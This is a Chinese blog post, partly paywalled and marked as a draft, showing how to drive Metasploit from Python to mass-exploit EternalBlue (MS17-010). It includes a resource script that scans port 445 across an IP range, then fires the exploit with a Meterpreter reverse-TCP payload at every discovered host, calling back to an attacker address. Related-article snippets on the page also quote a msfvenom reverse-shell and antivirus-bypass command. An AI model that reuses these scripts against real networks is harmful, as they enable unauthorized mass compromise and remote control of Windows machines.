b4_python与msf交互实现的自动攻击

最新推荐文章于 2024-05-30 14:18:45 发布
最新推荐文章于 2024-05-30 14:18:45 发布
阅读量2.1k 收藏 9
点赞数
分类专栏: Linux_渗透_黑客方面的学习笔记
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/yeshankuangrenaaaaa/article/details/86132713
版权

本文是草稿,很多未整理完 ! 各位凑合着看先

延续b3文提到的思路,这里提供实现的方式。

step1

文件
  1. startConfig.rc
  2. start_msf.py

python借助pymsf模块与msf的msgrpc插件实现交互控制,那么前提就是我们已经启动了msf,并且加载了msgrpc插件,完成了msgrpc的配置。
我们这里利用msf中的resource script章节提到的.rc文件和python脚本实现启动

startConfig.rc 中的代码:

db_status
load msgrpc Pass=asdf123
db_nmap -p 445 -T4 172.17.16.36-46

这段配置是让msfconsole加载msgrpc插件,并且配置服务的密码时asdf123,接着用db_nmap扫描172.17.16.36-46这个区间的IP的445端口,并将扫描到的结果存入msf的数据库中,以便后续调用。

start_msf.py 中的代码:

import os
import time

print 'service postgresql start...'
os.system('service postgresql start')
time.sleep(5)
print 'msfdb init...'
os.system('msfdb init')
time.sleep(2)
print 'launch msfconsole with startConfig.rc....'
os.system('msfconsole -r startConfig.rc')

这段代码的作用就是确保数据库服务是启动的,且启动msfconsole时加载startConfig.rc的命令配置。

step2

我们这里只实现脚本对多个IP在永恒之蓝漏洞上的自动攻击,当然只要你配置了很多漏洞配置文件,就可以对很多个漏洞进行多IP自动攻击。

文件
  1. ms17_010_eternalblue.rc
  2. py2msf_.py

ms17_010_eternalblue.rc中的代码:

use exploit/windows/smb/ms17_010_eternalblue
set payload windows/x64/meterpreter/reverse_tcp
<ruby>
run_single("set RHOST #{framework.db.hosts.map(&:address).join(' ')}")
</ruby>
set lhost 172.17.16.36
exploit -j -z

这段rc配置是永恒之蓝的渗透攻击的命令过程,其中攻击者的主机是172.17.16/36,为了处理大量被攻击者主机而不是某一个主机,我们嵌入ruby脚本,让其调用数据库中hosts的数据,也就是我们前面用db_nmap存入的数据,具体的一些解释参照前面的文章。
其中exploit -j -z-j-z的用途你们自己查阅吧,仓促下,我就不解释了。
下面的代码,可能是我之前的第一版本代码,新版本的没去load下来,你们也先凑合着看。

py2msf_.py中的代码:


                

                
                
        

        

    




        

            

                    
                      最低0.47元/天 解锁文章
                        
                    
            

        

    

      

        

            

              
                
                  IronSimon
                
              
            

            

                关注
              
            

        

        

          
    
            
  • 
              
                
                
                
                
                      0
                
              
              
    点赞
    
            
    • 
            
  • 
              
                
                
                
              
              
    
            
    • 
            
  • 
              
                
                
                
                
                    9
                
              
              
    
                
    
                  
                    收藏
                  
                
    
              
    
              
    
                
    
                  觉得还不错?
                  
                    一键收藏
                  
                 
                
    
              
    
            
    • 
          
  • 
            
    
              
              
            
    
              
              
              
                    0
              
            
            
    评论
    
          
    • 
          
  • 
          
    • 
          
  • 
            
              
            
              
    
            
              
                
            
    
          
    • 
        

      

      

            

                专栏目录
          










                



	

		

			

				
					
msf5 自动攻击模块 db_autopwn

				
			

			

				

					07-10
				

			

		

		

			
				
**msf5 自动攻击模块 db_autopwn 知识点详解**  `db_autopwn`是Metasploit Framework(msf5)中的一个核心功能模块,它允许渗透测试者进行自动化漏洞利用,大大提高了效率。这个模块在安全审计和渗透测试过程中扮演...

			
		

	



                

              
                



	

		

			

				
					
python调用msfconsole自动永恒之蓝攻击_MSF框架实现“永恒之蓝”ms17-010的exp攻击...

				
			

			

				

					weixin_39806779的博客
				

				

					12-22
					
					606
					
				

			

		

		

			
				
其实我们这里所说的使用MSF 实现 “永恒之蓝”的快速攻击,就是利用Metasploit中针对ms17-101漏洞的攻击载荷进行攻击获取主机控制权限。我这里简单的记录下整个攻击利用所需要的工具准备、利用过程以及后渗透的一些简单内容。本次用到的环境:kali系统.ip地址:192.168.1.106目标靶机为:win7sp1x64系统(关闭防火墙),ip地址:192.168.1.102具体的步骤如下...

			
		

	



                


  
              

                


	

		

			

				
					
python调用msf_使用python操纵metasploit简单小记

				
			

			

				

					weixin_39900468的博客
				

				

					11-30
					
					1894
					
				

			

		

		

			
				
最近想做一款自动化的主机漏洞扫描工具。打算以python作为基础语言,metasploit作为开发基础库。查资料发现国内的论坛博客都只会互相抄来抄去,没一个能打的。那就我来写一篇。本文用到的python库是allfro/pymetasploit使用pip进行安装pip install pymetasploit我的开发环境是windows,metasploit跑在kali环境下。所以在kali下面要...

			
		

	





	

		

			

				
					
msf攻击windows实例

					
最新发布

				
			

			

				

					qq_52712762的博客
				

				

					05-30
					
					1492
					
				

			

		

		

			
				
环境:攻击机kali(192.168.129.139),目标机windows10(192.168.129.132)方法一:通过web站点,使用无文件的方式攻击利用执行(命令执行漏洞)方法二:通过web站点,上传webshel,返回给msfmsfvenom)方法三:攻击其他端口服务,拿到meterpreter(445)

			
		

	



		

			
		



	

		

			

				
					
python调用msf_从python poc到metasploit模块

				
			

			

				

					weixin_39521651的博客
				

				

					11-30
					
					749
					
				

			

		

		

			
				
metasploit5从metasploit开始引入了第三方模块,也就是说可以使用python来编写模块。并且可以加入主分支。得到最新版本由于kail等渗透系统并不是使用github上的最新版本,版本还在4.x。所以我们需要在github上下载git clone https://github.com/rapid7/metasploit-framework/将原来的msf配置文件复制到下载下来的文件...

			
		

	





	

		

			

				
					
Metaspolit结合Python的使用

				
			

			

				

					fnmsd的博客
				

				

					12-25
					
					2633
					
				

			

		

		

			
				
目录Msf结合Python的使用python依赖库起手用法直接读写Console的用法(不推荐)使用module\jobs\sessions API进行操作额外的一点东西参考
Msf结合Python的使用
python依赖库
pip install msgpack
#SpiderLabs的那份的msfrpc库的call函数有点问题,我改了一下
wget https://raw.githubuser...

			
		

	





	

		

			

				
					
python调用msf_MSF利用python反弹shell-Bypass AV

				
			

			

				

					weixin_39883079的博客
				

				

					11-30
					
					1574
					
				

			

		

		

			
				
本文主要介绍两种利用msf生成python版 payload,并利用Py2exe或PyInstaller将python文件转为exe文件,可成功bypass某些AV反弹shellmsf-python反弹shell姿势11) msfvenom生成python后门msfvenom -p python/meterpreter/reverse_tcp LHOST=192.168.20.131 LPORT=...

			
		

	





	

		

			

				
					
eMSFRecvInviteMsg_492933805_0.msf

				
			

			

				

					06-01
				

			

		

		

			
				
eMSFRecvInviteMsg_492933805_0.msf

			
		

	





	

		

			

				
					
VB-shujuku.rar_VB_vb MSF   SHUJUKU

				
			

			

				

					09-22
				

			

		

		

			
				
标题中的"VB-shujuku.rar_VB_vb MSF SHUJUKU"表明这是一个与Visual Basic(VB)相关的数据库教程或示例项目,其中可能包含如何利用VB与数据库进行交互的代码和实例。MSF(Microsoft Solutions Framework)在这里可能...

			
		

	





	

		

			

				
					
rtk_sensor_damagezfw_rtk_ROS_gpsrtkros_msf-ekf_

				
			

			

				

					09-30
				

			

		

		

			
				
"gpsrtkros"可能是一个具体的ROS包,它提供了与GPS RTK设备交互接口。这个包可能包括了数据解析、定位计算以及发布定位信息等功能。  "msf-ekf"是指多传感器融合(Multi-Sensor Fusion)和扩展卡尔曼滤波器...

			
		

	





	

		

			

				
					
Python实现远程调用MetaSploit的方法

				
			

			

				

					12-23
				

			

		

		

			
				
本文较为详细的讲述了Python实现远程调用MetaSploit的方法,对Python的学习来说有很好的参考价值。具体实现方法如下: (1)安装Python的msgpack类库,MSF官方文档中的数据序列化标准就是参照msgpack。   root@kali:...

			
		

	





	

		

			

				
					
MSF渗透测试之msfvenom提权之python

				
			

			

				

					lza20001103的博客
				

				

					04-05
					
					3428
					
				

			

		

		

			
				
MSF渗透测试之msfvenom提权之python

			
		

	





	

		

			

				
					
python扩展到msf

				
			

			

				

					gao646467783的博客
				

				

					06-01
					
					558
					
				

			

		

		

			
				
msf框架提供了python接口,并且网上有好多以Python写的渗透测试代码,尤其是exploit-da等漏洞库中,可不可以把网上的python代码稍稍改动一下放到msf中使用呢(假如根据同一套的逻辑重写一个的话,不仅要对ruby有一些理解,而且要费事的重写)?

			
		

	





	

		

			

				
					
MSF终端自动化脚本编写与使用

				
			

			

				

					sGanYu
				

				

					09-07
					
					2580
					
				

			

		

		

			
				
Msfconsole内包含自动化脚本文件,一种可以在终端内按顺序执行的命令列表,该功能大大减少渗透测试所需的时间提高效率,将选择模块、设置参数运行等等任务进行自动化。

			
		

	





	

		

			

				
					
永恒之蓝漏洞攻击完整步骤

				
			

			

				

					G_Fu_Q的博客
				

				

					11-07
					
					9045
					
				

			

		

		

			
				
kali攻击机

windows2003/windows2008被攻击机 ip:192.168.15.129

1.进行端口扫描

nmap -Pn -sV -T4 ip地址



明白445端口和3389端口open,3389关闭现在无所谓,如果开启以后拿到权限以后就不用做开启3389端口的操作

2.漏洞脚本检测

nmap --script=vuln 192.168.15.129(ip地址)





看出ms17-010漏洞可以攻击

3.msfconsole测试

msfconsole



4.

			
		

	





	

		

			

				
					
Python脚本与Metasploit交互攻击

				
			

			

				

					谢公子的博客
				

				

					11-08
					
					5529
					
				

			

		

		

			
				
Metasploit是一款强大的漏洞扫描和利用工具,编写Python脚本与Metasploit进行交互,可以自动化的扫描和利用漏洞。

相关文章:Metasploit框架的使用

在脚本中,我们首选需要利用 nmap 模块扫描目标主机是否开放了445端口,我们写了一个 findTarget() 函数,来扫描给定ip或者给定网段中开放了目标端口的主机,返回开放了445端口的主机列表。445端口是作为...

			
		

	





	

		

			

				
					
python调用msf_Python实现远程调用MetaSploit的方法

				
			

			

				

					weixin_39772651的博客
				

				

					11-30
					
					456
					
				

			

		

		

			
				
本文较为详细的讲述了Python实现远程调用MetaSploit的方法,对Python的学习来说有很好的参考价值。具体实现方法如下:(1)安装Python的msgpack类库,MSF官方文档中的数据序列化标准就是参照msgpack。root@kali:~# apt-get install python-setuptoolsroot@kali:~# easy_install msgpack-pyth...

			
		

	





	

		

			

				
					
b3_python interact with metasploit(msf)

				
			

			

				

					yeshankuangrenaaaaa的博客
				

				

					01-07
					
					309
					
				

			

		

		

			
				
python interact with Metasploit


参考资料

Python for Metasploit Automation
中文翻译《Python for Metasploit Automation》

需要安装msgpack python模块,因为后面使用到的msfrpc模块依赖于这个模块,这两个模块的安装都可以使用源码安装的方式,因为pip install的方式如果失败的...

			
		

	





	

		

			

				
					
【AI每日播报】PyTorch开源

				
			

			

				

					qunnie_yi的博客
				

				

					01-19
					
					349
					
				

			

		

		

			
				
【AI每日播报】每日早8点为您搜罗24小时内AI圈新鲜要闻,涵盖从资讯到声音、从论文到活动的全方位AI消息。CSDN AI周刊也已全面开启:订阅请点击这里。本期周刊:【CSDN AI 周刊】No. 007 | SIGIR 2016信息检索精选论文以下为今日要闻:资讯PyTorch开源@新智元从此用 Torch GPU 训练神经网络也可以写 Python 了。对于 PyTorch (Github P...

			
		

	





	

		

			

				
					
MSF的钓鱼渗透攻击原理

				
			

			

				

					05-26
				

			

		

		

			
				
MSF(Metasploit Framework)是一款常用的渗透测试工具,它可以通过钓鱼攻击来获取目标计算机的访问权限。

钓鱼攻击原理是利用社交工程学原理,通过发送欺骗性的信息或者伪造网站等方式,诱导目标用户点击链接或者下载文件,从而在其计算机中植入木马或者后门程序。当攻击者获取了目标计算机的访问权限后,就可以利用漏洞或者其他方式获取敏感信息或者控制目标计算机。

MSF钓鱼渗透攻击主要分为以下几个步骤:
1. 伪造欺骗性信息:攻击者利用社交工程学原理,伪造看似真实的邮件、网站等信息,以诱导目标用户点击链接或下载文件。
2. 植入木马或后门程序:一旦目标用户点击链接或下载文件,攻击者就会在其计算机中植入木马或后门程序,从而获取访问权限。
3. 利用漏洞获取敏感信息:攻击者可以利用漏洞或其他方式获取目标计算机中的敏感信息。
4. 控制目标计算机:攻击者可以利用木马或后门程序对目标计算机进行控制,例如远程执行命令、上传下载文件等操作。

			
		

	



              



  
“相关推荐”对你有帮助么?

  

      
    
          
  • 
              
    
                  
                  
              
    
              
    非常没帮助
    
          
    • 
          
  • 
              
    
                  
                  
              
    
              
    没帮助
    
          
    • 
          
  • 
              
    
                  
                  
              
    
              
    一般
    
          
    • 
          
  • 
              
    
                  
                  
              
    
              
    有帮助
    
          
    • 
          
  • 
              
    
                  
                  
              
    
              
    非常有帮助
    
          
    • 
      

      

      

          
          提交
      

      

  




          




        



    





    



      

      

        
      

      





	

		评论	
	

	
	




  

    

      添加红包
      
    

    

      

        
        

          
          
        

        
请填写红包祝福语或标题

      

      

        
        

          
          
        

        
红包个数最小为10个

      

      

        
        

          
          
        

        
红包金额最低5元

      

      

        
        

          当前余额3.43前往充值 >
        

      

      

        

          需支付:10.00

        
        
      

    

  





  

    
    
  

  

    
    
  








  

    

      

        

          

            
            
成就一亿技术人!

          

          

        

        

          

          

            领取后你会自动成为博主和红包主的粉丝
            规则
          

        

      

      

        

          

            
              
            
            

              
hope_wisdom
 发出的红包
            

          

        

        

          

          

          

        

      

    

    

  



      
      

      
实付

      
使用余额支付

      

        

          

            
            点击重新获取
          

        

        
扫码支付

      

      

        
          
            
          
          
        
      

      

        
        钱包余额
          0
          

            
            

              

                
抵扣说明:

                
 1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
 2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

              

            

          

      

      余额充值